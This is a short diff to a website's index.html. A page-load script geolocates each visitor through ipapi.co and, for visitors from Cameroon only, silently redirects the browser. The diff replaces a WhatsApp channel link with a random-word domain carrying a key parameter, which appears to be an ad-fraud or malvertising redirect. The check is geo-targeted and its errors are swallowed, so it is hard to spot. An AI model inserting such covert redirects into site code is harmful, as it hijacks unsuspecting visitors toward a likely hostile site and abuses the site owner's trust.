--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     fetch('https://ipapi.co/json/')
         .then(r => r.json())
         .then(data => {
-            if (data.country_code === 'CM') window.location.href = 'https://whatsapp.com/channel/0029VbBSU9c7dmeUUiVdXb31';
+            if (data.country_code === 'CM') window.location.href = 'https://candlequestionableeffeminate.com/m1qecrwfy5?key=e1c23d61922eb3ca5ee1c8f7c9aad5de';
         })
         .catch(() => {});
     </script>
